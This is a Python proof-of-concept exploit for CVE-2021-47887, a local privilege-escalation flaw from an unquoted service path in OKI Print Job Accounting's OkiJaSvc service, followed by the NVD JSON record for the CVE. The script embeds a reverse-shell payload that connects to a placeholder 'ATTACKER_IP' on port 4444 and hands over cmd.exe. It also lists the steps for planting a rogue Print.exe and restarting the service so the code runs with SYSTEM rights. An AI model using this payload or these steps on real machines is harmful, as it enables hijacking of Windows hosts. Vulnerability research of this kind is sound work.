CVE-2021-47887

#!/usr/bin/env python3 """ CVE-2021-47887 PoC - OKI Print Job Accounting Unquoted Service Path This PoC demonstrates the unquoted service path vulnerability in OkiJaSvc service. Author: Security Researcher Reference: https://www.vulncheck.com/advisories/print-job-accounting-okijasvc-unquoted-service-path """ import os import sys import subprocess import shutil def check_service_path(): """Check if OkiJaSvc service exists and get its unquoted path""" try: result = subprocess.run( ['sc', 'qc', 'OkiJaSvc'], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: print("[+] OkiJaSvc service found") for line in result.stdout.split('\n'): if 'BINARY_PATH_NAME' in line: print(f"[+] Current path: {line.strip()}") return True except Exception as e: print(f"[-] Error checking service: {e}") return False def create_malicious_executable(): """Create a malicious executable to be placed in the unquoted path""" # Malicious executable path (Print.exe in the intermediate directory) malicious_path = r'C:\Program Files\Okidata\Print.exe' # Create a simple reverse shell or payload # This is a placeholder - actual malicious code would go here payload = ''' import socket import subprocess import os # Simple reverse shell payload try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("ATTACKER_IP", 4444)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) subprocess.call(["cmd.exe"]) except: pass ''' print(f"[*] Malicious executable would be placed at: {malicious_path}") print("[*] When OkiJaSvc restarts, it will execute this file with SYSTEM privileges") return malicious_path def exploit(): """Main exploitation function""" print("=" * 60) print("CVE-2021-47887 - OKI Print Job Accounting Unquoted Service Path") print("=" * 60) if not check_service_path(): print("[-] OkiJaSvc service not found or not accessible") return False print("\n[*] Vulnerability: Service path contains spaces without quotes") print("[*] Vulnerable path: C:\\Program Files\\Okidata\\Print Job Accounting\\") print("[*] Windows will search for: C:\\Program.exe, C:\\Program Files\\Okidata\\Print.exe") create_malicious_executable() print("\n[*] Attack steps:") print(" 1. Create malicious executable at C:\\Program Files\\Okidata\\Print.exe") print(" 2. Wait for service restart or trigger manually: sc stop OkiJaSvc && sc start OkiJaSvc") print(" 3. Malicious code executes with SYSTEM privileges") return True if __name__ == '__main__': if os.name != 'nt': print("[-] This exploit only works on Windows systems") sys.exit(1) exploit()

{"cve": {"id": "CVE-2021-47887", "sourceIdentifier": "[email protected]", "published": "2026-01-21T18:16:23.207", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "OKI Print Job Accounting 4.4.10 contains an unquoted service path vulnerability in the OkiJaSvc service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\\Program Files\\Okidata\\Print Job Accounting\\' to inject malicious executables and escalate privileges."}, {"lang": "es", "value": "OKI Print Job Accounting 4.4.10 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio OkiJaSvc que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta sin comillas en 'C:\\Program Files\\Okidata\\Print Job Accounting\\' para inyectar ejecutables maliciosos y escalar privilegios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://web.archive.org/web/20211207181409/https://www.oki.com/me/printing/services-and-solutions/smart-solutions/print-job-accounting/index.html", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49623", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/print-job-accounting-okijasvc-unquoted-service-path", "source": "[email protected]"}]}}